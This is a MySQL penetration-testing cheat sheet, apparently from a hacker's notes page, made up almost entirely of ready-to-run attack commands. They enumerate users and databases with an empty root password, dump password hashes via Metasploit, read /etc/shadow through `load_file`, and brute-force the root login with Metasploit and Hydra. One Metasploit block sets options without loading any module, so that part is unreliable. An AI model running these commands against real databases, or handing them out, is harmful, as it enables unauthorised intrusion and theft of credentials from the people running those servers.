SQL
Structured Query Language (SQL) is a standardized programming language that is used to manage relational databases and perform various operations on the data in them.
Enum
# Default scan
nmap $IP -sV -p 3306
# Empty password script
nmap $IP -sV -p 3306 --script=mysql-empty-password
# Get Mysql info
nmap $IP -sV -p 3306 --script=mysql-info
# Get mysql users
nmap $IP -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"
# Get mysql databases
nmap $IP -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
# Get mysql variables
nmap $IP -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"
# mysql audit
nmap $IP -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
# Try to connect directly without a password
mysql -h $IP -u root
# Run query
nmap $IP -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='root',mysqlpass=''"
# Metasploit way
msfconsole
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts $IP
set verbose false
run
## Hashdump
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump
setg rhosts $IP
set username root
set password ""
run
Manipulate local files via db
# connect to instance
mysql -h $IP -u root
# read local file
select load_file("/etc/shadow");
Bruteforce
# Metasploit way
msfconsole
use auxiliary/scanner/mysql/mysql_login
setg rhosts $IP
set verbose false
set stop_on_success true
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set username root
run
# Hydra
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $IP mysql
Last updated